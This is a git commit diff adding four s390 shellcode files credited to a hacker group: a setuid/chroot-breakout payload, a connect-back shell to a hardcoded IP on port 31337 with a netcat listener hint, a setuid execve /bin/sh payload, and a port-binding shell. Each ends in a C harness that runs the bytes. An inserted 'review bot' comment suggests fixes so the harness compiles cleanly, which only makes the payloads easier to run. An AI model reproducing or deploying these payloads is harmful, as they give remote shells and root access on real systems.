
initial push of all stuff :)

vanhauser-thc committed Jun 4, 2018
1 parent 1bf4156 commit dfbf6f563fd603e051f44a00e375b592a002b736
Showing 424 changed files with 54,242 additions and 0 deletions.
@@ -0,0 +1,65 @@
/*----------------------------------------------------------------------*/
/* s390 shellcode 0x0a / 0x0 free */
/* setuid / setgid / chroot break */
/* code jcyberpunk@thehackerschoice.com */
/*----------------------------------------------------------------------*/
char shellcode[] =
"\x0d\x10" /* basr %r1,0 */
"\x41\x90\x10\x98" /* la %r9,152(%r1) */
"\xa7\xa8\xfb\xb4" /* lhi %r10,-1100 */
"\xa7\x68\x04\x56" /* lhi %r6,1110 */
"\x1a\x6a" /* ar %r6,%r10 */
"\x42\x60\x10\x98" /* stc %r6,152(%r1) */
"\x17\x22" /* xr %r2,%r2 */
"\x42\x20\x10\x9f" /* stc %r2,159(%r1) */
"\x0d\xe9" /* basr %r14,%r9 */
"\xa7\x68\x04\x7a" /* lhi %r6,1146 */
"\x1a\x6a" /* ar %r6,%r10 */
"\x42\x60\x10\x99" /* stc %r6,153(%r1) */
"\x0d\xe9" /* basr %r14,%r9 */
"\x41\x20\x10\x9c" /* la %r2,156(%r1) */
"\x17\x33" /* xr %r3,%r3 */
"\xa7\x68\x04\x73" /* lhi %r6,1139 */
"\x1a\x6a" /* ar %r6,%r10 */
"\x42\x60\x10\x99" /* stc %r6,153(%r1) */
"\x0d\xe9" /* basr %r14,%r9 */
"\x41\x20\x10\x9c" /* la %r2,156(%r1) */
"\xa7\x68\x04\x89" /* lhi %r6,1161 */
"\x1a\x6a" /* ar %r6,%r10 */
"\x42\x60\x10\x99" /* stc %r6,153(%r1) */
"\x0d\xe9" /* basr %r14,%r9 */
"\xa7\xb8\x05\x39" /* lhi %r11,1337 */
"\x1a\xba" /* ar %r11,%r10 */
"\xa7\x68\x04\x58" /* lhi %r6,1112 */
"\x1a\x6a" /* ar %r6,%r10 */
"\x42\x60\x10\x99" /* stc %r6,153(%r1) */
"\x41\x20\x10\x9d" /* la %r2,157(%r1) */
"\x0d\xe9" /* basr %r14,%r9 */
"\x46\xb0\x10\x58" /* bct %r11,88(%r1) */
"\x41\x20\x10\x9e" /* la %r2,158(%r1) */
"\xa7\x68\x04\x89" /* lhi %r6,1161 */
"\x1a\x6a" /* ar %r6,%r10 */
"\x42\x60\x10\x99" /* stc %r6,153(%r1) */
"\x0d\xe9" /* basr %r14,%r9 */
"\xa7\x68\x04\x57" /* lhi %r6,1111 */
"\x1a\x6a" /* ar %r6,%r10 */
"\x42\x60\x10\x99" /* stc %r6,153(%r1) */
"\x41\x20\x10\xa0" /* la %r2,160(%r1) */
"\x50\x20\x10\xa8" /* st %r2,168(%r1) */
"\x41\x30\x10\xa8" /* la %r3,168(%r1) */
"\x17\x44" /* xr %r4,%r4 */
"\x42\x40\x10\xa7" /* stc %r4,167(%r1) */
"\x50\x40\x10\xac" /* st %r4,172(%r1) */
"\x41\x40\x10\xac" /* la %r4,172(%r1) */
"\x0d\xe9" /* basr %r14,%r9 */
"\x0b\x17" /* svc 23 <--- after modification */
"\x07\xfe" /* br %r14 */
"\x41\x2e\x2e\x5c" /* A.. <---- used for mkdir,chroot,chdir */
"\x2f\x62\x69\x6e" /* /bin */
"\x2f\x73\x68\x5c"; /* /sh\\ */
main()
{
void (*z)()=(void*)shellcode;
z();
}
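Review bot: The harness at the end of the hunk, `main()` followed by `void (*z)()=(void*)shellcode;`, relies on implicit int for main (removed in C99) and on an old-style empty parameter list, and it converts an object pointer to a function pointer, which ISO C does not define (C11 lists it only as a common extension); a strict compiler warns or rejects all three, so the file does not build cleanly as written. Declaring `int main(void)`, `void (*z)(void) = (void (*)(void))shellcode;` and ending with `return 0;` keeps the intent and compiles under -std=c11 -pedantic. The same four-line harness closes the other three hunks in this commit (`@@ -0,0 +1,75 @@`, `@@ -0,0 +1,39 @@`, `@@ -0,0 +1,82 @@`), so the change applies identically there. A one-line comment above `char shellcode[]` stating that the array is executed as code and that `z()` never returns on success would also help a reader who only sees the harness.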
@@ -0,0 +1,75 @@
/*----------------------------------------------------------------------*/
/* s390 shellcode 0x0a / 0x0 free */
/* connectback shell, use netcat listener from caller : nc -l -p 31337 */
/* ATTENTION ! altough the code is 0x0a and 0x0 free it may be the case */
/* that u wanna connect an ip like : 10.65.120.22 ( in our example ! ) */
/* our 192.168.0.1 ! in these cases u have 0xa and 0x0 in your address */
/* and u should conside to add some selfmodifing code where u patch the */
/* ip address values on the fly, like i did with the svc calls */
/* code jcyberpunk@thehackerschoice.com */
/*----------------------------------------------------------------------*/
char shellcode[] =
"\x0d\x10" /* basr %r1,%r0 */
"\x41\x90\x10\xa8" /* la %r9,168(%r1) */
"\xa7\x68\x04\x56" /* lhi %r6,1110 */
"\xa7\xa8\xfb\xb4" /* lhi %r10,-1100 */
"\x1a\x6a" /* ar %r6,%r10 */
"\x42\x60\x10\xa8" /* stc %r6,168(%r1) */
"\xa7\x28\x04\x4e" /* lhi %r2,1102 */
"\x1a\x2a" /* ar %r2,%r10 */
"\x40\x20\xf0\x78" /* sth %r2,120(%r15) */
"\xa7\x38\x7a\x69" /* lhi %r3,31337 */
"\x40\x30\xf0\x7a" /* sth %r3,122(%r15) */
"\x58\x40\x10\xac" /* l %r4,172(%r1) */
"\x50\x40\xf0\x7c" /* st %r4,124(%r15) */
"\x17\x44" /* xr %r4,%r4 */
"\xa7\x38\x04\x4d" /* lhi %r3,1101 */
"\x1a\x3a" /* ar %r3,%r10 */
"\x90\x24\xf0\x80" /* stm %r2,%r4,128(%r15) */
"\xa7\x28\x04\x4d" /* lhi %r2,1101 */
"\x1a\x2a" /* ar %r2,%r10 */
"\x41\x30\xf0\x80" /* la %r3,128(%r15) */
"\x0d\xe9" /* basr %r14,%r9 */
"\x18\x72" /* lr %r7,%r2 */
"\x41\x30\xf0\x78" /* la %r3,120(%r15) */
"\xa7\x88\x04\x5c" /* lhi %r8,1116 */
"\x1a\x8a" /* ar %r8,%r10 */
"\x18\x48" /* lr %r4,%r8 */
"\x90\x24\xf0\x80" /* stm %r2,%r4,128(%r15) */
"\xa7\x28\x04\x4f" /* lhi %r2,1103 */
"\x1a\x2a" /* ar %r2,%r10 */
"\x41\x30\xf0\x80" /* la %r3,128(%r15) */
"\x0d\xe9" /* basr %r14,%r9 */
"\x18\x27" /* lr %r2,%r7 */
"\xa7\x68\x04\x8b" /* lhi %r6,1163 */
"\x1a\x6a" /* ar %r6,%r10 */
"\x42\x60\x10\xa9" /* stc %r6,169(%r1) */
"\xa7\x38\x04\x4e" /* lhi %r3,1102 */
"\x1a\x3a" /* ar %r3,%r10 */
"\x0d\xe9" /* basr %r14,%r9 */
"\xa7\x3a\xff\xff" /* ahi %r3,-1 */
"\x0d\xe9" /* basr %r14,%r9 */
"\xa7\x3a\xff\xff" /* ahi %r3,-1 */
"\x0d\xe9" /* basr %r14,%r9 */
"\xa7\x68\x04\x57" /* lhi %r6,1111 */
"\x1a\x6a" /* ar %r6,%r10 */
"\x42\x60\x10\xa9" /* stc %r6,169(%r1) */
"\x41\x20\x10\xb0" /* la %r2,176(%r1) */
"\x50\x20\x10\xb8" /* st %r2,184(%r1) */
"\x41\x30\x10\xb8" /* la %r3,184(%r1) */
"\x17\x44" /* xr %r4,%r4 */
"\x42\x40\x10\xb7" /* stc %r4,183(%r1) */
"\x50\x40\x10\xbc" /* st %r4,188(%r1) */
"\x41\x40\x10\xbc" /* la %r4,188(%r1) */
"\x0d\xe9" /* basr %r14,%r9 */
"\x0b\x66" /* svc 102 <--- after modification */
"\x07\xfe" /* br %r14 */
"\x0a\x41\x78\x16" /* ip-address to connect back */
"\x2f\x62\x69\x6e" /* /bin */
"\x2f\x73\x68\x5c"; /* /sh\\ */
main()
{
void (*z)()=(void*)shellcode;
z();
}
@@ -0,0 +1,39 @@
/* setuid/setgid 0 execve s390 shellcode */
/* code by jcyberpunk@thehackerschoice.com */
char shellcode[]=
"\x0c\x10" /* bassm %r1,%r0 */
"\x41\x90\x10\x48" /* la %r9,72(%r1) */
"\xa7\xa8\xfb\xb4" /* lhi %r10,-1100 */
"\xa7\x68\x04\x56" /* lhi %r6,1110 */
"\x1a\x6a" /* ar %r6,%r10 */
"\x42\x60\x10\x48" /* stc %r6,72(%r1) */
"\x17\x22" /* xr %r2,%r2 */
"\x0d\xe9" /* basr %r14,%r9 */
"\xa7\x68\x04\x7a" /* lhi %r6,1146 */
"\x1a\x6a" /* ar %r6,%r10 */
"\x42\x60\x10\x49" /* stc %r6,73(%r1) */
"\x0d\xe9" /* basr %r14,%r9 */
"\xa7\x68\x04\x57" /* lhi %r6,1111 */
"\x1a\x6a" /* ar %r6,%r10 */
"\x42\x60\x10\x49" /* stc %r6,73(%r1) */
"\x41\x20\x10\x4c" /* la %r2,76(%r1) */
"\x50\x20\x10\x54" /* st %r2,84(%r1) */
"\x41\x30\x10\x54" /* la %r3,84(%r1) */
"\x17\x44" /* xr %r4,%r4 */
"\x42\x40\x10\x53" /* stc %r4,83(%r1) */
"\x50\x40\x10\x58" /* st %r4,88(%r1) */
"\x41\x40\x10\x58" /* la %r4,88(%r1) */
"\x0d\xe9" /* basr %r14,%r9 */
"\x0b\x17" /* svc n after self-modification */
"\x07\xfe" /* br %r14 */
"\x2f\x62" /* /b */
"\x69\x6e\x2f\x73" /* in/s */
"\x68\x5c"; /* h\ */
main()
{
void (*z)()=(void*)shellcode;
z();
}
@@ -0,0 +1,82 @@
/*----------------------------------------------------------------------*/
/* s390 portbinding shellcode - svc opcode 0x0a free */
/* code by jcyberpunk@thehackerschoice.com */
/*----------------------------------------------------------------------*/
char shellcode[]=
"\x0d\x10" /* basr %r1,%r0 */
"\x41\x90\x10\xd4" /* la %r9,212(%r1) */
"\xa7\x68\x04\x56" /* lhi %r6,1110 */
"\xa7\xa8\xfb\xb4" /* lhi %r10,-1100 */
"\x1a\x6a" /* ar %r6,%r10 */
"\x42\x60\x10\xd4" /* stc %r6,212(%r1) */
"\xa7\x28\x04\x4e" /* lhi %r2,1102 */
"\x1a\x2a" /* ar %r2,%r10 */
"\x40\x20\xf0\x78" /* sth %r2,120(%r15) */
"\xa7\x38\x7a\x69" /* lhi %r3,31337 */
"\x40\x30\xf0\x7a" /* sth %r3,122(%r15) */
"\x17\x44" /* xr %r4,%r4 */
"\x50\x40\xf0\x7c" /* st %r4,124(%r15) */
"\xa7\x38\x04\x4d" /* lhi %r3,1101 */
"\x1a\x3a" /* ar %r3,%r10 */
"\x90\x24\xf0\x80" /* stm %r2,%r4,128(%r15) */
"\xa7\x28\x04\x4d" /* lhi %r2,1101 */
"\x1a\x2a" /* ar %r2,%r10 */
"\x41\x30\xf0\x80" /* la %r3,128(%r15) */
"\x0d\xe9" /* basr %r14,%r9 */
"\x18\x72" /* lr %r7,%r2 */
"\x41\x30\xf0\x78" /* la %r3,120(%r15) */
"\xa7\x88\x04\x5c" /* lhi %r8,1116 */
"\x1a\x8a" /* ar %r8,%r10 */
"\x18\x48" /* lr %r4,%r8 */
"\x90\x24\xf0\x80" /* stm %r2,%r4,128(%r15) */
"\xa7\x28\x04\x4e" /* lhi %r2,1102 */
"\x1a\x2a" /* ar %r2,%r10 */
"\x41\x30\xf0\x80" /* la %r3,128(%r15) */
"\x0d\xe9" /* basr %r14,%r9 */
"\x18\x27" /* lr %r2,%r7 */
"\xa7\x38\x04\x4d" /* lhi %r3,1101 */
"\x1a\x3a" /* ar %r3,%r10 */
"\x90\x23\xf0\x80" /* stm %r2,%r3,128(%r15) */
"\xa7\x28\x04\x50" /* lhi %r2,1104 */
"\x1a\x2a" /* ar %r2,%r10 */
"\x41\x30\xf0\x80" /* la %r3,128(%r15) */
"\x0d\xe9" /* basr %r14,%r9 */
"\x18\x27" /* lr %r2,%r7 */
"\x41\x30\xf0\x78" /* la %r3,120(%r15) */
"\x90\x23\xf0\x80" /* stm %r2,%r3,128(%r15) */
"\x50\x80\xf0\x88" /* st %r8,136(%r15) */
"\xa7\x28\x04\x51" /* lhi %r2,1105 */
"\x1a\x2a" /* ar %r2,%r10 */
"\x41\x30\xf0\x80" /* la %r3,128(%r15) */
"\x0d\xe9" /* basr %r14,%r9 */
"\xa7\x68\x04\x8b" /* lhi %r6,1163 */
"\x1a\x6a" /* ar %r6,%r10 */
"\x42\x60\x10\xd5" /* stc %r6,213(%r1) */
"\xa7\x38\x04\x4e" /* lhi %r3,1102 */
"\x1a\x3a" /* ar %r3,%r10 */
"\x0d\xe9" /* basr %r14,%r9 */
"\xa7\x3a\xff\xff" /* ahi %r3,-1 */
"\x0d\xe9" /* basr %r14,%r9 */
"\xa7\x3a\xff\xff" /* ahi %r3,-1 */
"\x0d\xe9" /* basr %r14,%r9 */
"\xa7\x68\x04\x57" /* lhi %r6,1111 */
"\x1a\x6a" /* ar %r6,%r10 */
"\x42\x60\x10\xd5" /* stc %r6,213(%r1) */
"\x41\x20\x10\xd8" /* la %r2,216(%r1) */
"\x50\x20\x10\xe0" /* st %r2,224(%r1) */
"\x41\x30\x10\xe0" /* la %r3,224(%r1) */
"\x17\x44" /* xr %r4,%r4 */
"\x42\x40\x10\xdf" /* stc %r4,223(%r1) */
"\x50\x40\x10\xe4" /* st %r4,228(%r1) */
"\x41\x40\x10\xe4" /* la %r4,228(%r1) */
"\x0d\xe9" /* basr %r14,%r9 */
"\x0b\x66" /* svc 102 <--- after modification */
"\x07\xfe" /* br %r14 */
"\x2f\x62\x69\x6e" /* /bin */
"\x2f\x73\x68\x5c"; /* /sh\ */
main()
{
void (*z)()=(void*)shellcode;
z();
}
